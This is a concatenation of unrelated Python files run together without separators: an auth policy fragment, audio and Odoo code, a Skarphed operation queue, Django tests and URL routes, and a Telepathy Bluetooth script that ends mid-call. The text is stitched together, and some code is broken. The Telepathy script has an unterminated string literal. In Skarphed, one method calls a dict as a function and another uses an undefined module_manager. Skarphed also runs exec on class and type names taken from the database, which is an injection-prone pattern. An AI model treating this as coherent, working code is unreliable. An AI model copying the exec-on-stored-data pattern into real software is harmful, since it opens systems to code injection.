		if self.callback(params, request) is not None:
			return 'u:%s' % userid
		# Credentials rejected by the callback: re-issue a challenge
		# (implicitly returns None).
		_add_www_authenticate(request, self.secret, self.realm)

	def unauthenticated_userid(self, request):
		"""Return the claimed 'u:<username>' without running the credential callback."""
		params = _parse_authorization(request, self.secret, self.realm)
		if params is None:
			return None
		if not _is_valid_nonce(params['nonce'], self.secret):
			_add_www_authenticate(request, self.secret, self.realm)
			return None
		return 'u:%s' % params['username']

	def effective_principals(self, request):
		"""Return [Everyone] plus, for valid credentials, Authenticated, the userid and groups."""
		creds = [Everyone]
		params = _parse_authorization(request, self.secret, self.realm)
		if params is None:
			return creds
		if not _is_valid_nonce(params['nonce'], self.secret):
			_add_www_authenticate(request, self.secret, self.realm)
			return creds
		groups = self.callback(params, request)
		if groups is None:
			return creds
		creds.append(Authenticated)
		creds.append('u:%s' % params['username'])
		creds.extend(groups)
		return creds

	def remember(self, request, principal, **kw):
		# Bugfix: was '*kw', which broke the IAuthenticationPolicy contract —
		# callers pass keyword arguments (as PluginAuthenticationPolicy.remember
		# does) and would raise TypeError.  Digest auth has nothing to remember.
		return []

	def forget(self, request):
		"""Issue a fresh challenge header so the client drops its credentials."""
		return [('WWW-Authenticate', _generate_digest_challenge(
			round(time.time()),
			self.secret,
			self.realm,
			'NPDIGEST'
		))]


from . import models
from . import lroe

#!/usr/bin/env python

# Copyright (C) 2006-2016  Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/



from essentia_test import *
from essentia.streaming import TCToTotal as sTCToTotal

class TestTCToTotal(TestCase):
    """Streaming-mode tests for the TCToTotal algorithm."""

    def testEmpty(self):
        # An empty envelope must leave the pool untouched.
        gen = VectorInput([])
        tcToTotal = sTCToTotal()
        p = Pool()

        # Wire the streaming network: input -> TCToTotal -> pool descriptor.
        gen.data >> tcToTotal.envelope
        tcToTotal.TCToTotal >> (p, 'lowlevel.tctototal')

        run(gen)

        # No frames processed, so the descriptor must be absent.
        self.assertRaises(KeyError, lambda: p['lowlevel.tctototal'])


    def testOneValue(self):
        # A single sample is not enough for TCToTotal; running must fail.
        gen = VectorInput([1])
        tcToTotal = sTCToTotal()
        p = Pool()

        gen.data >> tcToTotal.envelope
        tcToTotal.TCToTotal >> (p, 'lowlevel.tctototal')

        self.assertRaises(RuntimeError, lambda: run(gen))


    def testRegression(self):
        # Build a triangular envelope: ramp up then down.
        # (Python 2: range() returns a list, hence .reverse() and list +.)
        envelope = range(22050)
        envelope.reverse()
        envelope = range(22050) + envelope

        gen = VectorInput(envelope)
        tcToTotal = sTCToTotal()
        p = Pool()

        gen.data >> tcToTotal.envelope
        tcToTotal.TCToTotal >> (p, 'lowlevel.tctototal')

        run(gen)

        # Streaming result must agree with the standard-mode algorithm.
        self.assertAlmostEqual(p['lowlevel.tctototal'],
                               TCToTotal()(envelope))


# Collect the tests above into a suite; run verbosely when executed directly.
suite = allTests(TestTCToTotal)

if __name__ == '__main__':
    TextTestRunner(verbosity=2).run(suite)

# Copyright 2015 ACSONE SA/NV
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import fields, models


class PosConfig(models.Model):
    """Extend the POS configuration with a default analytic account."""

    _inherit = "pos.config"

    # Analytic account associated with this POS configuration
    # (presumably applied to orders by related accounting logic — confirm
    # against the rest of the module).
    account_analytic_id = fields.Many2one(
        comodel_name="account.analytic.account", string="Analytic Account"
    )

#!/usr/bin/python
#-*- coding: utf-8 -*-

###########################################################
# © 2011 Daniel 'grindhold' Brendle and Team
#
# This file is part of Skarphed.
#
# Skarphed is free software: you can redistribute it and/or 
# modify it under the terms of the GNU Affero General Public License 
# as published by the Free Software Foundation, either 
# version 3 of the License, or (at your option) any later 
# version.
#
# Skarphed is distributed in the hope that it will be 
# useful, but WITHOUT ANY WARRANTY; without even the implied 
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR 
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public 
# License along with Skarphed. 
# If not, see http://www.gnu.org/licenses/.
###########################################################

import os
from daemon import Daemon
from time import sleep
from StringIO import StringIO
from traceback import print_exc

from skarphedcore.configuration import Configuration
from skarphedcore.database import Database
from skarphedcore.core import Core
from skarphedcore.module import Module

from common.errors import OperationException

class Operation(object):
    """
    Contais everything necessary to Handle Operations
    """

    STATUS_PENDING = 0
    STATUS_ACTIVE = 1
    STATUS_FAILED = 2

    VALID_STORAGE_TYPES = ('int','bool','str','unicode')

    def __init__(self, parent_id = None):
        """

        """
        self._id = None
        self._parent = parent_id
        self._values = {}

    @classmethod
    def drop_operation(cls,operation_id):
        """
        Drops an Operation, identified by it's Operation Id and
        it's children recursively
        Drop deletes the Operations from Database
        """
        db = Database()

        stmnt = "SELECT OPE_ID FROM OPERATIONS WHERE OPE_OPE_PARENT = ? AND OPE_STATUS IN (0, 2) ;"
        cur = db.query(stmnt,(operation_id,))
        for row in cur.fetchallmap():
            cls.drop_operation(row["OPE_ID"])

        stmnt = "DELETE FROM OPERATIONS WHERE OPE_ID = ? AND OPE_STATUS IN (0, 2) ;"
        db.query(stmnt,(operation_id,),commit=True)

    @classmethod
    def retry_operation(cls,operation_id):
        """
        Resets the state of an operation and it's children recursively to 0 (PENDING)
        The operation is identified by a given operationId
        """
        db = Database()

        stmnt = "SELECT OPE_ID FROM OPERATIONS WHERE OPE_OPE_PARENT = ? AND OPE_STATUS = 2 ;"
        cur = db.query(stmnt,(operation_id,))
        for row in cur.fetchallmap():
            cls.retry_operation(row["OPE_ID"])

        stmnt = "UPDATE OPERATIONS SET OPE_STATUS = 0 WHERE OPE_ID = ? AND OPE_STATUS = 2 ;"
        db.query(stmnt,(operation_id,),commit=True)

    @classmethod
    def cancel_operation(cls,operation_id):
        """
        Cancels an Operation, identified by it's Operation Id and
        it's children recursively
        Cancel Deletes the Operation from Database
        """
        db = Database()

        stmnt = "SELECT OPE_ID FROM OPERATIONS WHERE OPE_OPE_PARENT = ? AND OPE_STATUS = 0 ;"
        cur = db.query(stmnt,(operation_id,))
        for row in cur.fetchallmap():
            cls.cancel_operation(row["OPE_ID"])

        stmnt = "DELETE FROM OPERATIONS WHERE OPE_ID = ? AND OPE_STATUS = 0 ;"
        db.query(stmnt,(operation_id,),commit=True)

    @classmethod
    def restore_operation(cls, operation_record):
        """
        Restore an Operationobject stored in the database by a Dataset consisting of
        the operation's ID and the operation's TYPE:
        For example:   {"OPE_ID": 100, "OPE_TYPE": "TestOperation"}
        Restores the Operationobject's _values-attribute by the data saved
        in the DB-Table OPERATIONDATA
        """
        classname = operation_record["OPE_TYPE"]
        module = "" #TODO Implement modulename from database if Operation belongs to Module
        is_operation_of_module = False
        exec """
try:
    type(%(class)s)
except NameError,e:
    is_operation_of_module = True"""%{'class':classname}

        if is_operation_of_module:
            exec """
from %(module)s import %(class)s
operation = %(class)s()"""%{'class':classname,'module':module}
        else:
            exec """
operation = %(class)s()"""%{'class':classname}

        operation.set_id(operation_record['OPE_ID'])
        db = Database()
        stmnt = "SELECT OPD_KEY, OPD_VALUE, OPD_TYPE FROM OPERATIONDATA WHERE OPD_OPE_ID = ? ;"
        cur = db.query(stmnt,(operation_record["OPE_ID"],))
        for row in cur.fetchallmap():
            val = row["OPD_VALUE"]
            exec """val = %s(val)"""%row["OPD_TYPE"]
            operation.set_value(row["OPD_KEY"], val)
        return operation

    @classmethod
    def process_children(cls, operation):
        """
        Recursively executes the workloads of Operation's Childoperations
        It hereby catches exceptions in the workloads, sets the OPE_STATUS
        to 2 (FAILED) if a catch occurs, then passes the exception on to the 
        higher layer.
        If an Operation succeeds, it's entry in DB gets deleted
        """
        db = Database()

        stmnt = "SELECT OPE_ID, OPE_TYPE FROM OPERATIONS WHERE OPE_OPE_PARENT = ? ORDER BY OPE_INVOKED ;"
        stmnt_lock = "UPDATE OPERATIONS SET OPE_STATUS = 1 WHERE OPE_ID = ? ;"
        cur = db.query(stmnt,(operation.get_id(),))
        for row in cur.fetchallmap():
            child_operation = cls.restore_operation(row)
            db.query(stmnt_lock,(child_operation.get_id(),),commit=True)
            try:
                cls.process_children(child_operation)
                child_operation.do_workload()
            except Exception,e:
                stmnt_err = "UPDATE OPERATIONS SET OPE_STATUS = 2 WHERE OPE_ID = ? ;"
                db.query(stmnt_err,(int(row["OPE_ID"]),),commit=True)
                #TODO GENERATE ERROR IN LOG
                raise e
            stmnt_delete = "DELETE FROM OPERATIONS WHERE OPE_ID = ?;"
            db.query(stmnt_delete,(child_operation.get_id(),),commit=True)

    @classmethod
    def process_next(cls):
        """
        Sets the status of the next toplevel operation to 1 (ACTIVE)
        Fetches the next toplevel-operation from the database, applies a FILESYSTEMLOCK!
        Which is /tmp/scv_operating.lck !!! 
        """
        db = Database()
        configuration = Configuration()
        if os.path.exists(configuration.get_entry("core.webpath")+"/scv_operating.lck"):
            return False
        lockfile = open(configuration.get_entry("core.webpath")+"/scv_operating.lck","w")
        lockfile.close()
        stmnt_lock = "UPDATE OPERATIONS SET OPE_STATUS = 1 \
                            WHERE OPE_ID IN ( \
                              SELECT OPE_ID FROM OPERATIONS \
                              WHERE OPE_OPE_PARENT IS NULL AND OPE_STATUS = 0 \
                              AND OPE_INVOKED = ( \
                                SELECT MIN(OPE_INVOKED) FROM OPERATIONS  \
                                WHERE OPE_OPE_PARENT IS NULL AND OPE_STATUS = 0) \
                            ) ;"
        stmnt = "SELECT OPE_ID, OPE_TYPE FROM OPERATIONS WHERE OPE_OPE_PARENT IS NULL AND OPE_STATUS = 1 ;"
        db.query(stmnt_lock,commit=True)
        cur = db.query(stmnt)
        res = cur.fetchallmap()
        if len(res) > 0:
            operation = cls.restore_operation(res[0])
            try:
                cls.process_children(operation)
                operation.do_workload()
            except Exception, e:
                stmnt_err = "UPDATE OPERATIONS SET OPE_STATUS = 2 WHERE OPE_ID = ? ;"
                db.query(stmnt_err,(operation.get_id(),),commit=True)
                error = StringIO()
                print_exc(None,error)
                Core().log(error.getvalue())
            ret = True
        else:
            ret = False
        stmnt_delete = "DELETE FROM OPERATIONS WHERE OPE_STATUS = 1 ;"
        db.query(stmnt_delete,commit=True)
        db.commit()
        try:
            os.unlink(configuration.get_entry("core.webpath")+"/scv_operating.lck")
        except OSError,e :
            raise OperationException(OperationException.get_msg(0))
        return ret

    @classmethod
    def get_current_operations_for_gui(cls, operation_types=None):
        """
        Returns all Operations in an associative array.
        The array's indices are the operationIDs
        The Objects contain all information about the operations,
        including the Data
        """
        db = Database()
        #TODO CHECK HOW LISTS ARE HANDLED IN FDB
        if operation_types is not None and type(operation_types) == list:
            stmnt = "SELECT OPE_ID, OPE_OPE_PARENT, OPE_INVOKED, OPE_TYPE, OPE_STATUS FROM OPERATIONS WHERE OPE_TYPE IN (?) ORDER BY OPE_INVOKED ;"
            cur = db.query(stmnt,(operation_types))
        else:
            stmnt = "SELECT OPE_ID, OPE_OPE_PARENT, OPE_INVOKED, OPE_TYPE, OPE_STATUS FROM OPERATIONS ORDER BY OPE_INVOKED ;"
            cur = db.query(stmnt)
        ret = {}
        for row in cur.fetchallmap():
            operation = cls.restore_operation(row)
            custom_values = operation.get_values()

            ret[row["OPE_ID"]] = {"id":row["OPE_ID"],
                                  "parent":row["OPE_OPE_PARENT"],
                                  "invoked":str(row["OPE_INVOKED"]),
                                  "type":row["OPE_TYPE"],
                                  "status":row["OPE_STATUS"],
                                  "data":custom_values}
        return ret

    def get_values(self):
        """
        trivial
        """
        return self._values

    def get_value(self,key):
        """
        trivial
        """
        return self._values(key)

    def set_value(self,key,value):
        """
        trivial
        """
        self._values[key] = value

    def set_parent(self,parent_id):
        """
        trivial
        """
        self._parent = parent_id

    def get_parent(self):
        """
        trivial
        """
        return self._parent

    def set_db_id(self):
        """
        Get a new Operation Id from the Database and assign it to this
        Operation if this Operation's id is null. Afterwards return the 
        new Id
        """
        if self._id is None:
            self._id = Database().get_seq_next('OPE_GEN')
        return self._id

    def set_id(self, nr):
        """
        trivial
        """
        self._id = nr

    def get_id(self):
        """
        trivial
        """
        return self._id

    def store(self):
        """
        Stores this Operation to database.
        Also saves every user defined value in $_values as 
        long as it is a valid type         
        """
        db = Database()

        self.set_db_id()

        stmnt = "UPDATE OR INSERT INTO OPERATIONS (OPE_ID, OPE_OPE_PARENT, OPE_INVOKED, OPE_TYPE) \
                      VALUES (?,?,CURRENT_TIMESTAMP,?) MATCHING (OPE_ID);"
        db.query(stmnt,(self._id,self._parent,self.__class__.__name__),commit=True)

        stmnt = "UPDATE OR INSERT INTO OPERATIONDATA (OPD_OPE_ID, OPD_KEY, OPD_VALUE, OPD_TYPE) \
                      VALUES ( ?, ?, ?, ?) MATCHING(OPD_OPE_ID,OPD_KEY);"
        for key, value in self._values.items():
            typ = str(type(value)).replace("<type '","",1).replace("'>","",1)
            if typ not in Operation.VALID_STORAGE_TYPES:
                continue
            db.query(stmnt,(self._id,key,value,typ),commit=True)

    def do_workload(self):
        """
        This method must be overridden by inheriting classes.
        The code inside this method will be executed when the
        Operation is processed by Operation.processNext or 
        Operation.processChild 
        """
        pass

#MODULEINVOLVED
class ModuleOperation(Operation):
    """
    Abstracts Operations that have to do with modules
    """
    def __init__(self):
        """
        Plain Operation initialization.
        """
        Operation.__init__(self)

    def set_values(self,module):
        """
        Sets this operations values from module metadata

        *module* may be a metadata dict or a Module instance (the latter is
        not implemented yet).
        """
        if type(module) == dict:
            self.set_value("name",module["name"])
            self.set_value("hrname",module["hrname"])
            self.set_value("version_major",module["version_major"])
            self.set_value("version_minor",module["version_minor"])
            self.set_value("revision",module["revision"])
            if module.has_key("signature"):
                self.set_value("signature",module["signature"])
        elif module.__class__.__name__ == "Module":
            pass #TODO IMPLEMENT / DISCUSS AFTER IMPLEMENTING MODULE-SUBSYSTEM

    def get_meta(self):
        """
        Return the stored module metadata (the raw values dict).
        """
        return self._values
    
    @classmethod
    def get_currently_processed_modules(cls):
        """
        Returns an Array of ModuleOperation-Objects that are
        currently listed in the queue
        """
        db = Database()
        stmnt = "SELECT OPE_ID, OPE_OPE_PARENT, OPE_TYPE FROM OPERATIONS \
                   WHERE OPE_TYPE = 'ModuleInstallOperation' \
                   or OPE_TYPE = 'ModuleUninstallOperation' ;"
        cur = db.query(stmnt);
        ret = []
        for row in cur.fetchallmap():
            ret.append(Operation.restore_operation(row).get_meta())
        return ret

    def optimize_queue(self):
        """
        abstract
        """
        pass

#MODULEINVOLVED
class ModuleInstallOperation(ModuleOperation):
    """
    Manages the process to install a module to this server
    """
    def __init__(self):
        """Plain ModuleOperation initialization."""
        ModuleOperation.__init__(self)

    def do_workload(self):
        """Delegate installation of the module described by this operation's metadata."""
        meta = self.get_meta()
        Module.install_module(meta)

    def optimize_queue(self):
        """Queue-optimization hook; intentionally a no-op for now."""
        pass    #TODO Implement

#MODULEINVOLVED
class ModuleUninstallOperation(ModuleOperation):
    """
    Manages the process to uninstall a module from this server
    """
    def __init__(self):
        """
        Plain ModuleOperation initialization.
        """
        ModuleOperation.__init__(self)

    def do_workload(self):
        """
        tell the module manager to uninstall a specific module.
        """
        module = Module.get_module_by_name(self._values["name"])
        # NOTE(review): 'module_manager' is not defined or imported anywhere in
        # this file — executing this likely raises NameError.  Probably meant
        # to mirror ModuleInstallOperation and call Module.uninstall_module —
        # confirm before changing.
        module_manager.uninstall_module(module)

    def optimize_queue(self):
        """
        optimizes the queue. 
        """
        pass    #TODO Implement

#MODULEINVOLVED
class ModuleUpdateOperation(ModuleOperation):
    """
    Manages the process to update a module on this server
    """
    def __init__(self):
        """
        Plain ModuleOperation initialization.
        """
        ModuleOperation.__init__(self)

    def do_workload(self):
        """
        tell the module manager to update a specific module.
        """
        module = Module.get_module_by_name(self._values["name"])
        # NOTE(review): 'module_manager' is not defined or imported anywhere in
        # this file — executing this likely raises NameError; confirm the
        # intended target (possibly a Module classmethod).
        module_manager.update_module(module)
        
    def optimize_queue(self):
        """
        optimizes the queue. 
        """
        pass    #TODO Implement

class FailOperation(Operation):
    """
    For unittest purposes: An Operation that always fails
    """
    def __init__(self):
        """Plain Operation initialization."""
        Operation.__init__(self)

    def do_workload(self):
        """Raise unconditionally to simulate a failing workload."""
        raise Exception("Failoperation failed")

class TestOperation(Operation):
    """
    For unittest purposes: An Operation that always succeds
    """
    def __init__(self):
        """Plain Operation initialization."""
        Operation.__init__(self)

    def do_workload(self):
        """Do nothing: the workload always succeeds."""
        pass

class OperationDaemon(Daemon):
    """
    The daemon that actually executes the scheduled operations.
    """
    def __init__(self, pidfile):
        """
        Initialize the daemon with the pidfile it should use.
        """
        Daemon.__init__(self, pidfile)

    def stop(self):
        """
        Remove the operation lockfile if it exists, then stop the daemon.
        """
        # Compute the lockfile path once instead of querying the
        # configuration entry a second time for the removal.
        lockfile = Configuration().get_entry("core.webpath") + "/scv_operating.lck"
        if os.path.exists(lockfile):
            os.remove(lockfile)
        Daemon.stop(self)

    def run(self):
        """
        Process pending operations; when the queue is empty, poll for new
        work every two seconds.
        """
        while True:
            while Operation.process_next():
                pass
            sleep(2)


"""
Application file for the code snippets app.
"""

from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _


class SnippetsConfig(AppConfig):
    """
    Application configuration class for the code snippets app.
    """

    # Full Python path to the application package.
    name = 'apps.snippets'
    # Human-readable name (translatable), shown e.g. in the admin.
    verbose_name = _('Code snippets')

# -*- encoding: utf-8 -*-

from . import res_partner_bank
from . import account_bank_statement_import

"""
Tests course_creators.admin.py.
"""

from django.test import TestCase
from django.contrib.auth.models import User
from django.contrib.admin.sites import AdminSite
from django.http import HttpRequest
import mock

from course_creators.admin import CourseCreatorAdmin
from course_creators.models import CourseCreator
from django.core import mail
from student.roles import CourseCreatorRole
from student import auth


def mock_render_to_string(template_name, context):
    """Stand-in for render_to_string: encode the call as the repr of
    a (template_name, context) tuple so tests can compare exact calls."""
    return repr((template_name, context))


class CourseCreatorAdminTest(TestCase):
    """
    Tests for course creator admin.
    """

    def setUp(self):
        """ Test case setup """
        super(CourseCreatorAdminTest, self).setUp()
        # The user whose course-creator state is manipulated by the tests.
        self.user = User.objects.create_user('test_user', 'test_user+courses@edx.org', 'foo')
        self.table_entry = CourseCreator(user=self.user)
        self.table_entry.save()

        # Staff user that performs the admin changes.
        self.admin = User.objects.create_user('Mark', 'admin+courses@edx.org', 'foo')
        self.admin.is_staff = True

        self.request = HttpRequest()
        self.request.user = self.admin

        self.creator_admin = CourseCreatorAdmin(self.table_entry, AdminSite())

        self.studio_request_email = 'mark@marky.mark'
        # Feature flags patched onto settings.FEATURES for each test.
        self.enable_creator_group_patch = {
            "ENABLE_CREATOR_GROUP": True,
            "STUDIO_REQUEST_EMAIL": self.studio_request_email
        }

    @mock.patch('course_creators.admin.render_to_string', mock.Mock(side_effect=mock_render_to_string, autospec=True))
    @mock.patch('django.contrib.auth.models.User.email_user')
    def test_change_status(self, email_user):
        """
        Tests that updates to state impact the creator group maintained in authz.py and that e-mails are sent.
        """

        def change_state_and_verify_email(state, is_creator):
            """ Changes user state, verifies creator status, and verifies e-mail is sent based on transition """
            self._change_state(state)
            self.assertEqual(is_creator, auth.user_has_role(self.user, CourseCreatorRole()))

            context = {'studio_request_email': self.studio_request_email}
            if state == CourseCreator.GRANTED:
                template = 'emails/course_creator_granted.txt'
            elif state == CourseCreator.DENIED:
                template = 'emails/course_creator_denied.txt'
            else:
                template = 'emails/course_creator_revoked.txt'
            # render_to_string is mocked, so the expected subject/body are the
            # encoded (template, context) tuples produced by the mock.
            email_user.assert_called_with(
                mock_render_to_string('emails/course_creator_subject.txt', context),
                mock_render_to_string(template, context),
                self.studio_request_email
            )

        with mock.patch.dict('django.conf.settings.FEATURES', self.enable_creator_group_patch):

            # User is initially unrequested.
            self.assertFalse(auth.user_has_role(self.user, CourseCreatorRole()))

            change_state_and_verify_email(CourseCreator.GRANTED, True)

            change_state_and_verify_email(CourseCreator.DENIED, False)

            change_state_and_verify_email(CourseCreator.GRANTED, True)

            change_state_and_verify_email(CourseCreator.PENDING, False)

            change_state_and_verify_email(CourseCreator.GRANTED, True)

            change_state_and_verify_email(CourseCreator.UNREQUESTED, False)

            change_state_and_verify_email(CourseCreator.DENIED, False)

    @mock.patch('course_creators.admin.render_to_string', mock.Mock(side_effect=mock_render_to_string, autospec=True))
    def test_mail_admin_on_pending(self):
        """
        Tests that the admin account is notified when a user is in the 'pending' state.
        """

        def check_admin_message_state(state, expect_sent_to_admin, expect_sent_to_user):
            """ Changes user state and verifies e-mail sent to admin address only when pending. """
            mail.outbox = []
            self._change_state(state)

            # If a message is sent to the user about course creator status change, it will be the first
            # message sent. Admin message will follow.
            base_num_emails = 1 if expect_sent_to_user else 0
            if expect_sent_to_admin:
                context = {'user_name': "test_user", 'user_email': u'test_user+courses@edx.org'}
                self.assertEquals(base_num_emails + 1, len(mail.outbox), 'Expected admin message to be sent')
                sent_mail = mail.outbox[base_num_emails]
                self.assertEquals(
                    mock_render_to_string('emails/course_creator_admin_subject.txt', context),
                    sent_mail.subject
                )
                self.assertEquals(
                    mock_render_to_string('emails/course_creator_admin_user_pending.txt', context),
                    sent_mail.body
                )
                self.assertEquals(self.studio_request_email, sent_mail.from_email)
                self.assertEqual([self.studio_request_email], sent_mail.to)
            else:
                self.assertEquals(base_num_emails, len(mail.outbox))

        with mock.patch.dict('django.conf.settings.FEATURES', self.enable_creator_group_patch):
            # E-mail message should be sent to admin only when new state is PENDING, regardless of what
            # previous state was (unless previous state was already PENDING).
            # E-mail message sent to user only on transition into and out of GRANTED state.
            check_admin_message_state(CourseCreator.UNREQUESTED, expect_sent_to_admin=False, expect_sent_to_user=False)
            check_admin_message_state(CourseCreator.PENDING, expect_sent_to_admin=True, expect_sent_to_user=False)
            check_admin_message_state(CourseCreator.GRANTED, expect_sent_to_admin=False, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.DENIED, expect_sent_to_admin=False, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.GRANTED, expect_sent_to_admin=False, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.PENDING, expect_sent_to_admin=True, expect_sent_to_user=True)
            check_admin_message_state(CourseCreator.PENDING, expect_sent_to_admin=False, expect_sent_to_user=False)
            check_admin_message_state(CourseCreator.DENIED, expect_sent_to_admin=False, expect_sent_to_user=True)

    def _change_state(self, state):
        """ Helper method for changing state """
        self.table_entry.state = state
        self.creator_admin.save_model(self.request, self.table_entry, None, True)

    def test_add_permission(self):
        """
        Tests that staff cannot add entries
        """
        self.assertFalse(self.creator_admin.has_add_permission(self.request))

    def test_delete_permission(self):
        """
        Tests that staff cannot delete entries
        """
        self.assertFalse(self.creator_admin.has_delete_permission(self.request))

    def test_change_permission(self):
        """
        Tests that only staff can change entries
        """
        self.assertTrue(self.creator_admin.has_change_permission(self.request))

        # A non-staff user must not be able to change entries.
        self.request.user = self.user
        self.assertFalse(self.creator_admin.has_change_permission(self.request))

import unittest

from app import read_config

class ConfigFileReaderTest(unittest.TestCase):
    """Checks that read_config parses the sample 'config' file correctly."""

    def test_read(self):
        config = read_config('config')
        expected = {
            'cmus_host': 'raspberry',
            'cmus_passwd': 'PaSsWd',
            'app_host': 'localhost',
            'app_port': '8080',
        }
        for key, value in expected.items():
            self.assertEqual(config[key], value)

# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()

from django.conf.urls.defaults import *

import frontend.views as frontend_views
import codewiki.views
import codewiki.viewsuml


from django.contrib.syndication.views import feed as feed_view
from django.views.generic import date_based, list_detail
from django.views.generic.simple import direct_to_template
from django.contrib import admin
import django.contrib.auth.views as auth_views
from django.conf import settings

from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect

from django.contrib import admin
# Discover and register all ModelAdmin classes from installed apps.
admin.autodiscover()

# HACK: force a global default ordering on the auth User model. Need to move
# this somewhere more useful and try to make it less hacky, but this seems to
# be the easiest way unfortunately.
from django.contrib.auth.models import User
User._meta.ordering = ['username']


from frontend.feeds import LatestCodeObjects, LatestCodeObjectsBySearchTerm, LatestCodeObjectsByTag, LatestViewObjects, LatestScraperObjects

# Maps feed slug (captured by the /feeds/<url>/ pattern) to its Feed class.
feeds = {
    'all_code_objects': LatestCodeObjects,
    'all_scrapers': LatestScraperObjects,
    'all_views':   LatestViewObjects,
    'latest_code_objects_by_search_term': LatestCodeObjectsBySearchTerm,
    'latest_code_objects_by_tag': LatestCodeObjectsByTag,
}


# NOTE: uses the pre-Django-1.8 patterns()/string-view style throughout.
urlpatterns = patterns('',
    url(r'^$', frontend_views.frontpage, name="frontpage"),

    # redirects from old version (would clashes if you happen to have a scraper whose name is list!)
    (r'^scrapers/list/$', lambda request: HttpResponseRedirect(reverse('scraper_list_wiki_type', args=['scraper']))),

    url(r'^', include('codewiki.urls')),
    url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name="logout"),
    url(r'^accounts/', include('registration.urls')),
    url(r'^accounts/resend_activation_email/', frontend_views.resend_activation_email, name="resend_activation_email"),
    url(r'^captcha/', include('captcha.urls')),
    url(r'^attachauth', codewiki.views.attachauth),

    # allows direct viewing of the django tables
    url(r'^admin/', include(admin.site.urls)),

    # favicon
    (r'^favicon\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/media/images/favicon.ico'}),

    # RSS feeds
    url(r'^feeds/(?P<url>.*)/$', 'django.contrib.syndication.views.feed', {'feed_dict': feeds}, name='feeds'),

    # API
    (r'^api/', include('api.urls', namespace='foo', app_name='api')),

    # Status
    url(r'^status/$', codewiki.viewsuml.status, name='status'),

    # Documentation
    (r'^docs/', include('documentation.urls')),

    # Robots.txt
    (r'^robots.txt$', direct_to_template, {'template': 'robots.txt', 'mimetype': 'text/plain'}),

    # pdf cropper technology
    (r'^cropper/', include('cropper.urls')),

    # froth
    (r'^froth/', include('froth.urls')),

    # static media server for the dev sites / local dev
    url(r'^media/(?P<path>.*)$',       'django.views.static.serve', {'document_root': settings.MEDIA_DIR, 'show_indexes':True}),
    url(r'^media-admin/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ADMIN_DIR, 'show_indexes':True}),

    #Rest of the site
    url(r'^', include('frontend.urls')),

    # redirects from old version
    (r'^editor/$', lambda request: HttpResponseRedirect('/scrapers/new/python?template=tutorial_python_trivial')),
    (r'^scrapers/show/(?P<short_name>[\w_\-]+)/(?:data/|map-only/)?$',
                   lambda request, short_name: HttpResponseRedirect(reverse('code_overview', args=['scraper', short_name]))),


)

#!/usr/bin/env python

import sys

import gobject
import dbus.mainloop.glib
dbus.mainloop.glib.DBusGMainLoop(set_as_default = True)

import telepathy


DBUS_PROPERTIES = 'org.freedesktop.DBus.Properties'


def get_registry():
	"""Load and return the Telepathy connection-manager registry."""
	registry = telepathy.client.ManagerRegistry()
	registry.LoadManagers()
	return registry


def get_connection_manager(reg):
	"""Return the 'bluewire' connection manager from the registry *reg*."""
	return reg.GetManager('bluewire')


class Action(object):
	"""Base link of a chained, asynchronous to-do list.

	Actions are appended one after another; each action triggers the
	next one from its _on_done callback.
	"""

	def __init__(self):
		self._action = None  # the next action in the chain, if any

	def queue_action(self):
		pass

	def append_action(self, action):
		# Each action may have at most one successor.
		assert self._action is None
		self._action = action

	def get_next_action(self):
		assert self._action is not None
		return self._action

	def _on_done(self):
		# Kick off the next action in the chain, if one was appended.
		if self._action is None:
			return
		self._action.queue_action()

	def _on_error(self, error):
		print error

	def _on_generic_message(self, *args):
		pass


class DummyAction(Action):
	"""No-op action that completes on the next main-loop idle cycle."""

	def queue_action(self):
		# Completing via an idle callback keeps the chain asynchronous.
		gobject.idle_add(self._on_done)


class QuitLoop(Action):
	"""Terminal action: stops the given GLib main loop when queued."""

	def __init__(self, loop):
		super(QuitLoop, self).__init__()
		self._loop = loop

	def queue_action(self):
		self._loop.quit()


class DisplayParams(Action):

	def __init__(self, cm):
		super(DisplayParams, self).__init__()
		self._cm = cm

	def queue_action(self):
		self._cm[telepathy.interfaces.CONN_MGR_INTERFACE].GetParameters(
			'bluetooth,
			reply_handler = self._on_done,
			error_handler = self._on_error,
		)

	def _on_done(self, params):
		print "Connection Parameters:"
		for name, flags, signature, default in params:
			print "\t%s (%s)" % (name, signature),

			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_REQUIRED:
				print "required",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_REGISTER:
				print "register",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_SECRET:
				print "secret",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_DBUS_PROPERTY:
				print "dbus-property",
			if flags & telepathy.constants.CONN_MGR_PARAM_FLAG_HAS_DEFAULT:
				print "has-default(%s)" % default,

			print ""
		super(DisplayParams, self)._on_done()


class RequestConnection(Action):
	"""Requests a new 'bluetooth' connection from the connection manager."""

	def __init__(self, cm, username, password, forward):
		super(RequestConnection, self).__init__()
		self._cm = cm

		self._conn = None
		self._serviceName = None

		self._username = username
		self._password = password
		self._forward = forward

	@property
	def conn(self):
		return self._conn

	@property
	def serviceName(self):
		return self._serviceName

	def queue_action(self):
		# BUG FIX: the protocol argument mixed quote styles ('bluetooth"),
		# which was a syntax error.
		self._cm[telepathy.server.CONNECTION_MANAGER].RequestConnection(
			'bluetooth',
			{
				'account':  self._username,
				'password': self._password,
